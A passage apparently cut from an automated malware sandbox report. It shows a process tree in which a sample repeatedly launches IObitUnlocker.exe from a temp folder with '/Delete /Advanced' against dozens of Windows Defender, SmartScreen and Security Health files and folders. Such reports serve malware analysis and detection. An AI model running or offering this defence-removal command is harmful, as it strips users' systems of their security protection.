Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
